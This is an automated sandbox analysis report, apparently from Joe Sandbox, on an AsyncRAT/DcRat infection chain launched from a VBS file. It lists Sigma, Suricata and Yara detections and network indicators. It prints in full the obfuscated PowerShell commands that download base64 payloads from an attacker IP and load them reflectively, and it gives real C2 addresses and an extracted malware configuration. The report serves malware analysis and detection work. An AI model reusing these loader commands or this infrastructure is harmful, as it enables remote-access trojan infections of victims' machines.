            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$qkvwr = '0';$iaquc = 'C:\Users\user\Desktop\sostener.vbs';[Byte[]] $ywjdh = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString('http://91.202.233.169/Tak/Reg/Marz/DRG/RTC/F3dll.txt'));[system.AppDomain]::CurrentDomain.Load($ywjdh).GetType('ClassLibrary1.Class1').GetMethod('ZxKHG').Invoke($null, [object[]] ('txt.1JD/SVNE/zraM/geR/kaT/961.332.202.19//:ptth' , $iaquc , 'RgvuG', $qkvwr, '1', 'Roda' ));", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$qkvwr = '0';$iaquc = 'C:\Users\user\Desktop\sostener.vbs';[Byte[]] $ywjdh = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString('http://91.202.233.169/Tak/Reg/Marz/DRG/RTC/F3dll.txt'));[system.AppDomain]::CurrentDomain.Load($ywjdh).GetType('ClassLibrary1.Class1').GetMethod('ZxKHG').Invoke($null, [object[]] ('txt.1JD/SVNE/zraM/geR/kaT/961.332.202.19//:ptth' , $iaquc , 'RgvuG', $qkvwr, '1', 'Roda' ));", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ExeNy = 'J Bx Gs dgB3 HI I 9 C Jw w Cc Ow k Gk YQBx HU Yw g D0 I n CU c B6 EE YwBP Gc SQBu E0 cg l Cc OwBb EI eQB0 GU WwBd F0 I k Hk dwBq GQ a g D0 I Bb HM eQBz HQ ZQBt C4 QwBv G4 dgBl HI d Bd Do OgBG HI bwBt EI YQBz GU Ng 0 FM d By Gk bgBn Cg I o E4 ZQB3 C0 TwBi Go ZQBj HQ I BO GU d u Fc ZQBi EM b Bp GU bgB0 Ck LgBE G8 dwBu Gw bwBh GQ UwB0 HI aQBu Gc K n Gg d B0 H Og v C8 OQ x C4 Mg w DI Lg y DM Mw u DE Ng 5 C8 V Bh Gs LwBS GU Zw v E0 YQBy Ho LwBE FI Rw v FI V BD C8 Rg z GQ b Bs C4 d B4 HQ Jw p Ck OwBb HM eQBz HQ ZQBt C4 QQBw H R Bv G0 YQBp G4 XQ 6 Do QwB1 HI cgBl G4 d BE G8 bQBh Gk bg u Ew bwBh GQ K k Hk dwBq GQ a p C4 RwBl HQ V B5 H ZQ o Cc QwBs GE cwBz Ew aQBi HI YQBy Hk MQ u EM b Bh HM cw x Cc KQ u Ec ZQB0 E0 ZQB0 Gg bwBk Cg JwBa Hg SwBI Ec Jw p C4 SQBu HY bwBr GU K k G4 dQBs Gw L g Fs bwBi Go ZQBj HQ WwBd F0 I o Cc d B4 HQ Lg x Eo R v FM VgBO EU LwB6 HI YQBN C8 ZwBl FI LwBr GE V v Dk Ng x C4 Mw z DI Lg y D Mg u DE OQ v C8 OgBw HQ d Bo Cc I s C J Bp GE cQB1 GM I s C JwBS Gc dgB1 Ec Jw s C J Bx Gs dgB3 HI L g Cc MQ n Cw I n FI bwBk GE Jw g Ck KQ 7 ==';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $ExeNy.replace(' ','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\user\Desktop\sostener.vbs');powershell $KByHL;, ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3848, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$qkvwr = '0';$iaquc = 'C:\Users\user\Desktop\sostener.vbs';[Byte[]] $ywjdh = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadSt
            Sigma detected: Usage Of Web Request Commands And Cmdlets
            Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$qkvwr = '0';$iaquc = 'C:\Users\user\Desktop\sostener.vbs';[Byte[]] $ywjdh = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString('http://91.202.233.169/Tak/Reg/Marz/DRG/RTC/F3dll.txt'));[system.AppDomain]::CurrentDomain.Load($ywjdh).GetType('ClassLibrary1.Class1').GetMethod('ZxKHG').Invoke($null, [object[]] ('txt.1JD/SVNE/zraM/geR/kaT/961.332.202.19//:ptth' , $iaquc , 'RgvuG', $qkvwr, '1', 'Roda' ));", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$qkvwr = '0';$iaquc = 'C:\Users\user\Desktop\sostener.vbs';[Byte[]] $ywjdh = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString('http://91.202.233.169/Tak/Reg/Marz/DRG/RTC/F3dll.txt'));[system.AppDomain]::CurrentDomain.Load($ywjdh).GetType('ClassLibrary1.Class1').GetMethod('ZxKHG').Invoke($null, [object[]] ('txt.1JD/SVNE/zraM/geR/kaT/961.332.202.19//:ptth' , $iaquc , 'RgvuG', $qkvwr, '1', 'Roda' ));", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ExeNy = 'J Bx Gs dgB3 HI I 9 C Jw w Cc Ow k Gk YQBx HU Yw g D0 I n CU c B6 EE YwBP Gc SQBu E0 cg l Cc OwBb EI eQB0 GU WwBd F0 I k Hk dwBq GQ a g D0 I Bb HM eQBz HQ ZQBt C4 QwBv G4 dgBl HI d Bd Do OgBG HI bwBt EI YQBz GU Ng 0 FM d By Gk bgBn Cg I o E4 ZQB3 C0 TwBi Go ZQBj HQ I BO GU d u Fc ZQBi EM b Bp GU bgB0 Ck LgBE G8 dwBu Gw bwBh GQ UwB0 HI aQBu Gc K n Gg d B0 H Og v C8 OQ x C4 Mg w DI Lg y DM Mw u DE Ng 5 C8 V Bh Gs LwBS GU Zw v E0 YQBy Ho LwBE FI Rw v FI V BD C8 Rg z GQ b Bs C4 d B4 HQ Jw p Ck OwBb HM eQBz HQ ZQBt C4 QQBw H R Bv G0 YQBp G4 XQ 6 Do QwB1 HI cgBl G4 d BE G8 bQBh Gk bg u Ew bwBh GQ K k Hk dwBq GQ a p C4 RwBl HQ V B5 H ZQ o Cc QwBs GE cwBz Ew aQBi HI YQBy Hk MQ u EM b Bh HM cw x Cc KQ u Ec ZQB0 E0 ZQB0 Gg bwBk Cg JwBa Hg SwBI Ec Jw p C4 SQBu HY bwBr GU K k G4 dQBs Gw L g Fs bwBi Go ZQBj HQ WwBd F0 I o Cc d B4 HQ Lg x Eo R v FM VgBO EU LwB6 HI YQBN C8 ZwBl FI LwBr GE V v Dk Ng x C4 Mw z DI Lg y D Mg u DE OQ v C8 OgBw HQ d Bo Cc I s C J Bp GE cQB1 GM I s C JwBS Gc dgB1 Ec Jw s C J Bx Gs dgB3 HI L g Cc MQ n Cw I n FI bwBk GE Jw g Ck KQ 7 ==';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $ExeNy.replace(' ','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\user\Desktop\sostener.vbs');powershell $KByHL;, ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3848, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$qkvwr = '0';$iaquc = 'C:\Users\user\Desktop\sostener.vbs';[Byte[]] $ywjdh = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadSt
            Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
            Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\sostener.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\sostener.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\sostener.vbs", ProcessId: 5332, ProcessName: wscript.exe
            Sigma detected: Non Interactive PowerShell Process Spawned
            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ExeNy = 'J Bx Gs dgB3 HI I 9 C Jw w Cc Ow k Gk YQBx HU Yw g D0 I n CU c B6 EE YwBP Gc SQBu E0 cg l Cc OwBb EI eQB0 GU WwBd F0 I k Hk dwBq GQ a g D0 I Bb HM eQBz HQ ZQBt C4 QwBv G4 dgBl HI d Bd Do OgBG HI bwBt EI YQBz GU Ng 0 FM d By Gk bgBn Cg I o E4 ZQB3 C0 TwBi Go ZQBj HQ I BO GU d u Fc ZQBi EM b Bp GU bgB0 Ck LgBE G8 dwBu Gw bwBh GQ UwB0 HI aQBu Gc K n Gg d B0 H Og v C8 OQ x C4 Mg w DI Lg y DM Mw u DE Ng 5 C8 V Bh Gs LwBS GU Zw v E0 YQBy Ho LwBE FI Rw v FI V BD C8 Rg z GQ b Bs C4 d B4 HQ Jw p Ck OwBb HM eQBz HQ ZQBt C4 QQBw H R Bv G0 YQBp G4 XQ 6 Do QwB1 HI cgBl G4 d BE G8 bQBh Gk bg u Ew bwBh GQ K k Hk dwBq GQ a p C4 RwBl HQ V B5 H ZQ o Cc QwBs GE cwBz Ew aQBi HI YQBy Hk MQ u EM b Bh HM cw x Cc KQ u Ec ZQB0 E0 ZQB0 Gg bwBk Cg JwBa Hg SwBI Ec Jw p C4 SQBu HY bwBr GU K k G4 dQBs Gw L g Fs bwBi Go ZQBj HQ WwBd F0 I o Cc d B4 HQ Lg x Eo R v FM VgBO EU LwB6 HI YQBN C8 ZwBl FI LwBr GE V v Dk Ng x C4 Mw z DI Lg y D Mg u DE OQ v C8 OgBw HQ d Bo Cc I s C J Bp GE cQB1 GM I s C JwBS Gc dgB1 Ec Jw s C J Bx Gs dgB3 HI L g Cc MQ n Cw I n FI bwBk GE Jw g Ck KQ 7 ==';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $ExeNy.replace(' ','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\user\Desktop\sostener.vbs');powershell $KByHL;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ExeNy = 'J Bx Gs dgB3 HI I 9 C Jw w Cc Ow k Gk YQBx HU Yw g D0 I n CU c B6 EE YwBP Gc SQBu E0 cg l Cc OwBb EI eQB0 GU WwBd F0 I k Hk dwBq GQ a g D0 I Bb HM eQBz HQ ZQBt C4 QwBv G4 dgBl HI d Bd Do OgBG HI bwBt EI YQBz GU Ng 0 FM d By Gk bgBn Cg I o E4 ZQB3 C0 TwBi Go ZQBj HQ I BO GU d u Fc ZQBi EM b Bp GU bgB0 Ck LgBE G8 dwBu Gw bwBh GQ UwB0 HI aQBu Gc K n Gg d B0 H Og v C8 OQ x C4 Mg w DI Lg y DM Mw u DE Ng 5 C8 V Bh Gs LwBS GU Zw v E0 YQBy Ho LwBE FI Rw v FI V BD C8 Rg z GQ b Bs C4 d B4 HQ Jw p Ck OwBb HM eQBz HQ ZQBt C4 QQBw H R Bv G0 YQBp G4 XQ 6 Do QwB1 HI cgBl G4 d BE G8 bQBh Gk bg u Ew bwBh GQ K k Hk dwBq GQ a p C4 RwBl HQ V B5 H ZQ o Cc QwBs GE cwBz Ew aQBi HI YQBy Hk MQ u EM b Bh HM cw x Cc KQ u Ec ZQB0 E0 ZQB0 Gg bwBk Cg JwBa Hg SwBI Ec Jw p C4 SQBu HY bwBr GU K k G4 dQBs Gw L g Fs bwBi Go ZQBj HQ WwBd F0 I o Cc d B4 HQ Lg x Eo R v FM VgBO EU LwB6 HI YQBN C8 ZwBl FI LwBr GE V v Dk Ng x C4 Mw z DI Lg y D Mg u DE OQ v C8 OgBw HQ d Bo Cc I s C J Bp GE cQB1 GM I s C JwBS Gc dgB1 Ec Jw s C J Bx Gs dgB3 HI L g Cc MQ n Cw I n FI bwBk GE Jw g Ck KQ 7 ==';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $ExeNy.replace(' ','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\user\Desktop\sostener.vbs');powershell $KByHL;, CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:

            Suricata Signatures

            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-10-01T06:29:58.380252+020020204241Exploit Kit Activity Detected91.202.233.16980192.168.2.449730TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-10-01T06:30:19.591904+020020348471Domain Observed Used for C2 Detected89.117.23.224455192.168.2.449737TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-10-01T06:30:19.591904+020028424781Malware Command and Control Activity Detected89.117.23.224455192.168.2.449737TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-10-01T06:29:58.030429+020028033053Unknown Traffic192.168.2.44973091.202.233.16980TCP
            2024-10-01T06:29:58.378098+020028033053Unknown Traffic192.168.2.44973091.202.233.16980TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-10-01T06:30:19.591904+020028480481Domain Observed Used for C2 Detected89.117.23.224455192.168.2.449737TCP

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Found malware configuration
            Source: 00000003.00000002.1690160988.0000018504E7A000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: AsyncRAT {"Server": ")8\"zc", "Ports": "$A<IlE,84,7;&gV", "Version": "*wacp!]6l[e", "BDOS": "U^2", "AES_key": "R4OsSR16j3MjPEBlkfzyOGTLnlxVVuwW", "Mutex": "n#QO", "Certificate": "UDq5O^", "ServerSignature": "1", "Group": "Oy\\iql0S13XbS4sp1@PsWg:PGIw'~?Q;ifHa#3ef8L\"SpWzk,&&}s;$/?J9UH3>j3={V'nCn.PI*|e>4&k2[2Y\"w$T+^X_j9HSG[?b*'54eS5e_~(e#Z\"n,TX*T->_qfnrv]TM^:Sm1uBPI9|\\4a^^?R|av{V =9J2E|^{wS7Zq,=)a;uL uRaE\"K5bW ycl@NpcoGBww~DzGBkD+U1vws!$\"Awn}G}9cJ6;M^g4xsh'`s^(KX%.#m`^wc.Syd?~c\"Lsj>]?`qx7a!]~a7*CV\\/w6F+j0{&]M*&[7-]2Y</uTKz[gT&GM", "AntiProcess": "HB!<i[>IoEHueVuN1#fc!@?Z#TsdM.i5RX/xjjmOH +NC,v <85~NN!Z.)uebFY`", "PasteBin": "FLVl;"}
            Multi AV Scanner detection for domain / URL
            Source: dczas.duckdns.orgVirustotal: Detection: 9%Perma Link
            Source: http://91.202.233.169Virustotal: Detection: 9%Perma Link
            AI detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability

            Software Vulnerabilities

            barindex
            Suspicious execution chain found
            Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

            Networking

            barindex
            Suricata IDS alerts for network traffic
            Source: Network trafficSuricata IDS: 2842478 - Severity 1 - ETPRO JA3 Hash - Suspected ASYNCRAT Server Cert (ja3s) : 89.117.23.22:4455 -> 192.168.2.4:49737
            Source: Network trafficSuricata IDS: 2034847 - Severity 1 - ET MALWARE Observed Malicious SSL Cert (AsyncRAT) : 89.117.23.22:4455 -> 192.168.2.4:49737
            Source: Network trafficSuricata IDS: 2848048 - Severity 1 - ETPRO MALWARE Observed Malicious SSL Cert (AsyncRAT) : 89.117.23.22:4455 -> 192.168.2.4:49737
            Source: Network trafficSuricata IDS: 2020424 - Severity 1 - ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 2 M1 : 91.202.233.169:80 -> 192.168.2.4:49730
            C2 URLs / IPs found in malware configuration
            Source: Malware configuration extractorURLs: )8"zc
            Uses dynamic DNS services
            Source: unknownDNS query: name: dczas.duckdns.org
            Yara detected Generic Downloader
            Source: Yara matchFile source: 3.2.powershell.exe.1851cfd0000.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.2.powershell.exe.18506078440.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.2.powershell.exe.18504da3b80.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000003.00000002.1707124383.000001851CFD0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
            Source: global trafficTCP traffic: 192.168.2.4:49737 -> 89.117.23.22:4455
            Source: global trafficHTTP traffic detected: GET /Tak/Reg/Marz/DRG/RTC/F3dll.txt HTTP/1.1Host: 91.202.233.169Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /Tak/Reg/Marz/DRG/RTC/F3Pe.txt HTTP/1.1Host: 91.202.233.169
            Source: global trafficHTTP traffic detected: GET /Tak/Reg/Marz/ENVS/DJ1.txt HTTP/1.1Host: 91.202.233.169
            Source: Joe Sandbox ViewIP Address: 91.202.233.169 91.202.233.169
            Source: Joe Sandbox ViewIP Address: 89.117.23.22 89.117.23.22
            Source: Joe Sandbox ViewASN Name: M247GB M247GB
            Source: Joe Sandbox ViewASN Name: LRTC-ASLT LRTC-ASLT
            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49730 -> 91.202.233.169:80
            Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.169
            Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.169
            Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.169
            Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.169
            Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.169
            Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.169
            Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.169
            Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.169
            Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.169
            Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.169
            Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.169
            Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.169
            Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.169
            Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.169
            Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.169
            Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.169
            Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.169
            Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.169
            Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.169
            Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.169
            Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.169
            Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.169
            Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.169
            Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.169
            Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.169
            Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.169
            Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.169
            Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.169
            Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.169
            Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.169
            Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.169
            Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.169
            Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.169
            Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.169
            Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.169
            Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.169
            Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.169
            Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.169
            Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.169
            Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.169
            Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.169
            Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.169
            Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.169
            Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.169
            Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.169
            Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.169
            Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.169
            Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.169
            Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.169
            Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.169
            Source: global trafficHTTP traffic detected: GET /Tak/Reg/Marz/DRG/RTC/F3dll.txt HTTP/1.1Host: 91.202.233.169Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /Tak/Reg/Marz/DRG/RTC/F3Pe.txt HTTP/1.1Host: 91.202.233.169
            Source: global trafficHTTP traffic detected: GET /Tak/Reg/Marz/ENVS/DJ1.txt HTTP/1.1Host: 91.202.233.169
            Source: global trafficDNS traffic detected: DNS query: dczas.duckdns.org
            Source: powershell.exe, 00000003.00000002.1690160988.0000018506223000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1690160988.0000018504D6C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: HTTP://91.202.233.169/TAK/REG/MARZ/ENVS/DJ1.TXT
            Source: powershell.exe, 00000003.00000002.1690160988.0000018504BE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1690160988.0000018506223000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1690160988.00000185058B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.169
            Source: powershell.exe, 00000003.00000002.1690160988.0000018505FD7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.169/Tak/Reg/Marz/DRG/R
            Source: powershell.exe, 00000003.00000002.1690160988.0000018504D6C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1690160988.0000018505FD7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.169/Tak/Reg/Marz/DRG/RTC/F3Pe.txt
            Source: powershell.exe, 00000003.00000002.1690160988.00000185049C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1689935401.00000185030F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.169/Tak/Reg/Marz/DRG/RTC/F3dll.txt
            Source: powershell.exe, 00000003.00000002.1690160988.0000018506223000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1690160988.0000018504D6C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.169/Tak/Reg/Marz/ENVS/DJ1.txt
            Source: powershell.exe, 00000003.00000002.1690160988.0000018506223000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.169/Tak/Reg/Marz/Ex
            Source: powershell.exe, 00000003.00000002.1690160988.00000185058B8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1690160988.0000018505FD7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.202.H
            Source: RegSvcs.exe, 00000004.00000002.2958714804.000000000148B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
            Source: RegSvcs.exe, 00000004.00000002.2958714804.000000000148B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
            Source: powershell.exe, 00000003.00000002.1690160988.00000185062A2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1703372117.0000018514A31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
            Source: powershell.exe, 00000003.00000002.1690160988.0000018504BE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
            Source: powershell.exe, 00000001.00000002.1721844392.000002244566F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1690160988.00000185049C1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.2959693552.0000000003181000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: powershell.exe, 00000003.00000002.1690160988.0000018504BE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
            Source: powershell.exe, 00000001.00000002.1721844392.000002244562B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1721844392.0000022445642000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1690160988.00000185049C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
            Source: powershell.exe, 00000003.00000002.1703372117.0000018514A31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
            Source: powershell.exe, 00000003.00000002.1703372117.0000018514A31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
            Source: powershell.exe, 00000003.00000002.1703372117.0000018514A31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
            Source: powershell.exe, 00000003.00000002.1690160988.0000018504BE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
            Source: powershell.exe, 00000003.00000002.1690160988.00000185058B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
            Source: powershell.exe, 00000003.00000002.1690160988.00000185062A2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1703372117.0000018514A31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe

            Key, Mouse, Clipboard, Microphone and Screen Capturing

            barindex
            Yara detected AsyncRAT
            Source: Yara matchFile source: 4.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.2.powershell.exe.18504e7a558.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.2.powershell.exe.18504e7a558.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000004.00000002.2957234369.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.1690160988.0000018504E7A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 4312, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 6884, type: MEMORYSTR

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: dump.pcap, type: PCAPMatched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
            Source: 3.2.powershell.exe.1851cfd0000.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects known downloader agent Author: ditekSHen
            Source: 4.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
            Source: 4.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
            Source: 4.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
            Source: 4.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables containing the string DcRatBy Author: ditekSHen
            Source: 3.2.powershell.exe.18504e7a558.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
            Source: 3.2.powershell.exe.18504e7a558.0.unpack, type: UNPACKEDPEMatched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
            Source: 3.2.powershell.exe.18504e7a558.0.unpack, type: UNPACKEDPEMatched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
            Source: 3.2.powershell.exe.18504e7a558.0.unpack, type: UNPACKEDPEMatched rule: Detects executables containing the string DcRatBy Author: ditekSHen
            Source: 3.2.powershell.exe.18504e7a558.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
